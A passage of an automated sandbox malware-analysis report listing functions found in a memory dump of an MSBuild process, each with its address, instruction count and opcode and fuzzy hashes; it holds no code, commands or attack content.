                                                                                                              Function 0144C3CD Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction ID: cccde10af337069bd3ebbcab36608dac360654e04463931c07745748668b4690
                                                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction Fuzzy Hash: 73216D36601652B7EB15AB998D40ABBBBB4EF50710F44802FFB95876A1F634DD40C360
                                                                                                              Function 0138E420 Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7046df5436a4ba278c22f8650dbcfe18bc4b419406506ee34a8c1216a0a74adc
                                                                                                              • Instruction ID: 4a526c0a79e4571aff0536861f125c7bbe8c7d809162bceaaa91af88dcac78cb
                                                                                                              • Opcode Fuzzy Hash: 7046df5436a4ba278c22f8650dbcfe18bc4b419406506ee34a8c1216a0a74adc
                                                                                                              • Instruction Fuzzy Hash: B231B832A0162C9BDB31EB1CCC41FEE77B9EB15754F0101B5E649A7190D6749E808FA0
                                                                                                              Function 013C4588 Relevance: .1, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction ID: 46aed3b9f454a578f230ff80315d2d021b389f95379b28d760c7be29b2124e16
                                                                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction Fuzzy Hash: 3521A332A00609EFCB11DF58C990A8EBBB5FF48B28F10C069EE159F245D670EE15CB90
                                                                                                              Function 013C44B0 Relevance: .1, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 535041362736bbb1d0e1fdef683580d0f56c95d08f61f4d08011c5061da46bce
                                                                                                              • Instruction ID: 4687a08a5b60f354219bc228302e5e31653b99310a07368193a760ef5d115f0e
                                                                                                              • Opcode Fuzzy Hash: 535041362736bbb1d0e1fdef683580d0f56c95d08f61f4d08011c5061da46bce
                                                                                                              • Instruction Fuzzy Hash: A9217C72604746DBCB22DE18C990B6BB7E8FB98B64F01452DFD549B641D730ED018BA2
                                                                                                              Function 0138E388 Relevance: .1, Instructions: 86COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction ID: 27189720e0ac568c2d6dbbf9f851e3eaf4e85203c1570ddc32ddf73e08cf00a1
                                                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction Fuzzy Hash: 43319831600708EFE721DFA8C884F6AB7F9EF85358F1045A9E5569B690E770EE02CB50
                                                                                                              Function 0140E609 Relevance: .1, Instructions: 86COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b4e7fd6f2515d1925aa4eebaaf5ad0fbb49bf22dd2aee30850c22b74d56ec8d
                                                                                                              • Instruction ID: d46abf73634461da93e04a058f14ddae3aed6265c0327db7e55512ba349f47ed
                                                                                                              • Opcode Fuzzy Hash: 8b4e7fd6f2515d1925aa4eebaaf5ad0fbb49bf22dd2aee30850c22b74d56ec8d
                                                                                                              • Instruction Fuzzy Hash: 6531A275600205EFCB15CF1DD8849AEB7B5FF84304B554C6AF809AB3A1E731E961CB90
                                                                                                              Function 014106F1 Relevance: .1, Instructions: 79COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 274d5ba680917d81df04f610d8d7218c753cb8f6720819b87607e0ce497d7270
                                                                                                              • Instruction ID: 5f5b718ec6fdccda208a42e2c2d8d49c9c0dad50f1c934ae0a2e9df44a7df95d
                                                                                                              • Opcode Fuzzy Hash: 274d5ba680917d81df04f610d8d7218c753cb8f6720819b87607e0ce497d7270
                                                                                                              • Instruction Fuzzy Hash: 48219F72900229EBCF20DF59C881ABEB7F4FF48744B54406AF941AB354D738AD42CBA0
                                                                                                              Function 0141019F Relevance: .1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8d53ba3db4970825b6ae2b54e0e802108095944b5d8e4e7e621b4588122097aa
                                                                                                              • Instruction ID: 1840947b0df1cfa92f3072591ba390b7da67d130d3c6ad07d80016a9533b77dc
                                                                                                              • Opcode Fuzzy Hash: 8d53ba3db4970825b6ae2b54e0e802108095944b5d8e4e7e621b4588122097aa
                                                                                                              • Instruction Fuzzy Hash: 02219A72600645EFD715DBACD940FAAB7A8FF58744F14406AF904DB7A0E638ED40CBA8
                                                                                                              Function 01410283 Relevance: .1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 467cc281e1f5a966f4b4b3bd56746488ed10bf3a1f7577625d679b8233cebc92
                                                                                                              • Instruction ID: 2be1804138525e1d690eb43bc1d2fd207a5d5fb19c536ea71fbe1e344f5a09ad
                                                                                                              • Opcode Fuzzy Hash: 467cc281e1f5a966f4b4b3bd56746488ed10bf3a1f7577625d679b8233cebc92
                                                                                                              • Instruction Fuzzy Hash: 1C21F27290434A9FD711EF9DC844B9BBBDCEF91244F084467BD80C7265E730C989C6A2
                                                                                                              Function 013B2835 Relevance: .1, Instructions: 73COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ccab2507e138bde33d3d73d82bb1897fd758b4cff53712893f6a718249a806ef
                                                                                                              • Instruction ID: 61e0bd60a212c4888f19f58a798051fd7c4f79d04a14b25dfd942dd7bc6e9178
                                                                                                              • Opcode Fuzzy Hash: ccab2507e138bde33d3d73d82bb1897fd758b4cff53712893f6a718249a806ef
                                                                                                              • Instruction Fuzzy Hash: 17213831605685DBE322976CCC54B657F94EF41B7CF280368FB24DBAE2EB68E8018241
                                                                                                              Function 013CA30B Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 90b1dbb0a767e560c8477db8908305462089ab8607bd7c82567beb32bfe1e9c4
                                                                                                              • Instruction ID: f22f44c4fe2b235e4ceaff6e5d2518557636e8bd2a25307e923f674c85c2eb49
                                                                                                              • Opcode Fuzzy Hash: 90b1dbb0a767e560c8477db8908305462089ab8607bd7c82567beb32bfe1e9c4
                                                                                                              • Instruction Fuzzy Hash: CE219835210A01AFCB25DF29CC00B46B7E5EF08B08F24846DA50ACBB61E731E842CB98
                                                                                                              Function 0144A49A Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c21a16b7f6a853e2b152b2124546e906f229e427194ea9b770ccf72b029e7fcd
                                                                                                              • Instruction ID: d5c21045b7e1f3bb887e2dd28c49624ba6424dfbaaee890796565455f4d21b91
                                                                                                              • Opcode Fuzzy Hash: c21a16b7f6a853e2b152b2124546e906f229e427194ea9b770ccf72b029e7fcd
                                                                                                              • Instruction Fuzzy Hash: C61123722C0A11BBF7225659AC00F6B7699DBD4B60F71002AF70ACB2A0EFB0DC0187D5
                                                                                                              Function 01410946 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 92ee03331d1c3ca3b4ff45c6d994d3cc7d55f2766ca1a388e1b19392a80cb7ab
                                                                                                              • Instruction ID: bfc120b1e141ad31e1ed1384eff3828322b85a82faa8248d8d25e1669b459daa
                                                                                                              • Opcode Fuzzy Hash: 92ee03331d1c3ca3b4ff45c6d994d3cc7d55f2766ca1a388e1b19392a80cb7ab
                                                                                                              • Instruction Fuzzy Hash: C721E6B1E10309ABDB20DFAAD8809AEFBF9FF98614F10012FE505A7354D7709945CB54
                                                                                                              Function 014280A8 Relevance: .1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                              • Instruction ID: 312b11fa5e912269416e8bca0e7028f21b6e0f4859638695b99c2d0baece5307
                                                                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                              • Instruction Fuzzy Hash: 5221817290021AFFDF129F58CC40BAEBBF9EF54310F60441AF944A7261D734D9918B50
                                                                                                              Function 013C0124 Relevance: .1, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                              • Instruction ID: 39cd1f442b764cd67bf575fe7c0dd94f82b50ed46d72f0f569dca0c477aae9f4
                                                                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                              • Instruction Fuzzy Hash: C111E27B600645EFD7269B49DC41FAABBBCEB80B58F10402DF6049B180D671ED44CB60
                                                                                                              Function 01398770 Relevance: .1, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 911aa1d5018b5024dc3e04f517fdb132a732f67cabaf1bd5cc1e6eb594375a50
                                                                                                              • Instruction ID: df37eaf6753408fb3b552000f690e7763e840188a079782c2c3992044f6565a3
                                                                                                              • Opcode Fuzzy Hash: 911aa1d5018b5024dc3e04f517fdb132a732f67cabaf1bd5cc1e6eb594375a50
                                                                                                              • Instruction Fuzzy Hash: 9211C4717016199BDF11CF4DC5C0A5ABBE9AF8B718B1940AEEE089F215D6B2D901C790
                                                                                                              Function 013980E9 Relevance: .1, Instructions: 66COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 950768f0da541938dfc41b16038834f9c3ebfa39591470bb28747d3686887336
                                                                                                              • Instruction ID: 1dc71c0a93a7c50bf0eae8cbf4e3640b6b72c401caa59939a191a432c81b28cd
                                                                                                              • Opcode Fuzzy Hash: 950768f0da541938dfc41b16038834f9c3ebfa39591470bb28747d3686887336
                                                                                                              • Instruction Fuzzy Hash: 4D218E75A0020ADFCB14CF98C581AAEBBF5FB89318F2441ADD505AB311CB71AD06CBD0
                                                                                                              Function 013C674D Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 83c84ce7df2d4a06ffb6770a758735b4628cc85a7e83ff0fa7d7cb2bab7ed870
                                                                                                              • Instruction ID: 605b1e85054395980ec47db8682c23494226e8175536208b243618bccb1500e9
                                                                                                              • Opcode Fuzzy Hash: 83c84ce7df2d4a06ffb6770a758735b4628cc85a7e83ff0fa7d7cb2bab7ed870
                                                                                                              • Instruction Fuzzy Hash: D4218EB5610B01EFD7209F69C841F66B7E8FF44654F44882DE69AC7751DA31AC40CB60
                                                                                                              Function 01426870 Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a2bf3d57618f99d8128f565514ff6f5cf22fec995c5aaa61c281309cc2068122
                                                                                                              • Instruction ID: c8a7a107f85e240d190dc21857da54260abfbaf2486a5e8f561cf7daac2fdfab
                                                                                                              • Opcode Fuzzy Hash: a2bf3d57618f99d8128f565514ff6f5cf22fec995c5aaa61c281309cc2068122
                                                                                                              • Instruction Fuzzy Hash: E511E332340524EFC722CB5DCD40F9AB7A8EF55754F42402AFA05DB270DA70E841C790
                                                                                                              Function 013BE8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8c6828afdef25afa22b4ea8955dfcf5d9affa95266ee072b857765fedcedd19f
                                                                                                              • Instruction ID: 25aa2e177b9a4e07bedb8f6ee65a318237f68fb789ec3b3bdf96ce59539afadd
                                                                                                              • Opcode Fuzzy Hash: 8c6828afdef25afa22b4ea8955dfcf5d9affa95266ee072b857765fedcedd19f
                                                                                                              • Instruction Fuzzy Hash: 4C110C333001149FCF19EB2DCC91AAF725BDBD5378B25453EDA22CB695E9309801C390
                                                                                                              Function 013C66B0 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eb23a85a89dbe0497561c5c1d1a6442816f1f5b8cb6ebfd4b55769d521eaa167
                                                                                                              • Instruction ID: 0d92c737bfed2e10bd53c63c2cdffd1ae068aed001a88bf917eef035f7f6d80d
                                                                                                              • Opcode Fuzzy Hash: eb23a85a89dbe0497561c5c1d1a6442816f1f5b8cb6ebfd4b55769d521eaa167
                                                                                                              • Instruction Fuzzy Hash: D311E3B6A01205DFCB25DF9DC581A5ABBF8EF84A14F02447DD9059B310F630DD00CB90
                                                                                                              Function 0145A8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                              • Instruction ID: 218c285584a6fdd67f47434f88ebaedf4dc01c355d6d9750db149131787e7966
                                                                                                              • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                              • Instruction Fuzzy Hash: 39110436A00915EFDB19CB58C805B9EFBB5EF94310F15826AEC5597350E631AD01CBC0
                                                                                                              Function 0141E7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                              • Instruction ID: 1678e47541099592d46d51234eb1559655150e0870836acc3ae3a1795d766383
                                                                                                              • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                              • Instruction Fuzzy Hash: E511A339600601EFEB329F49C840B5B7BA5EF55754F05842EEE09AB274DB31DC41DB90
                                                                                                              Function 013B27ED Relevance: .1, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 411ddbba193cd2106589f781027fde7f6c2297c9610958ae7d50beb536884de9
                                                                                                              • Instruction ID: 01474606a665041dba8cc23a25985add52a90ce3d235a3e7bcd053e4a4266262
                                                                                                              • Opcode Fuzzy Hash: 411ddbba193cd2106589f781027fde7f6c2297c9610958ae7d50beb536884de9
                                                                                                              • Instruction Fuzzy Hash: C201D631705649ABE316A66ED894F677F9CEF4079CF050079FB05CBAA1E924EC00C2A1
                                                                                                              Function 01394690 Relevance: .1, Instructions: 57COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1017f5670aaa0e255e47bf93b8188c29d2b1c411ed37e7a6aadc8253aeda37da
                                                                                                              • Instruction ID: e93d905a2b9c80ca9afe2b793ee7f2cce57213edf017149a4492761f954b68e7
                                                                                                              • Opcode Fuzzy Hash: 1017f5670aaa0e255e47bf93b8188c29d2b1c411ed37e7a6aadc8253aeda37da
                                                                                                              • Instruction Fuzzy Hash: A311C236210649AFDF25CF5DDA40F5A7BA8EB9A76CF044119F9248B650C370E801CF60
                                                                                                              Function 01464B00 Relevance: .1, Instructions: 57COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2ef8d00172f082d2a5b2dfa84e221b55423c7d05aef32a11d11ac714e67780de
                                                                                                              • Instruction ID: cd435f7b279fc2133247b12f609d4697f090778af177e5164e58e121295a9c89
                                                                                                              • Opcode Fuzzy Hash: 2ef8d00172f082d2a5b2dfa84e221b55423c7d05aef32a11d11ac714e67780de
                                                                                                              • Instruction Fuzzy Hash: C911C6366006119FDB219A6DD840F6BB7A9FFC4B18F19442AE64287764DA30A802C791
                                                                                                              Function 013C6620 Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: af4e2e0b88cf269ae9bd131d3e78daa5867bc5a402d6dd832730d476af0db889
                                                                                                              • Instruction ID: 6a728a8c36235e427683887c595df59d3630530e2541470b1ed8615aa54f348c
                                                                                                              • Opcode Fuzzy Hash: af4e2e0b88cf269ae9bd131d3e78daa5867bc5a402d6dd832730d476af0db889
                                                                                                              • Instruction Fuzzy Hash: AE11C2B2A00615ABEB22EF5DCD81B5EFBB8EF84B68F500059DA01A7300D730AD118B90
                                                                                                              Function 013BEA2E Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 745accc8aa80b602a1efb48d46e04af6ac55a4c685d2afc3a1b5e70ce068f604
                                                                                                              • Instruction ID: 802c92a7101b6b246488944db379ddcf033632a6ec6aac097e72c6e8daaadfa4
                                                                                                              • Opcode Fuzzy Hash: 745accc8aa80b602a1efb48d46e04af6ac55a4c685d2afc3a1b5e70ce068f604
                                                                                                              • Instruction Fuzzy Hash: C3019E7550010AAFD725EF1DE484F9ABBF9EB85318F20817AE2058F661D770EC82CB90
                                                                                                              Function 013BE53E Relevance: .1, Instructions: 55COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                              • Instruction ID: dcb0fe2a03f92e7601e525be5bbdec710bcd204bf5da1a8c0eafd12b0d2e22d8
                                                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                              • Instruction Fuzzy Hash: D111E5722056CADBEB23976CC984BA57BDCEB0174CF1900B5DF4197A92F728C842C650
                                                                                                              Function 0141E75D Relevance: .1, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                              • Instruction ID: 4823dac25ac73eb29d87d983377d81c0e0a7313710b6f07e63a5786ea72b8743
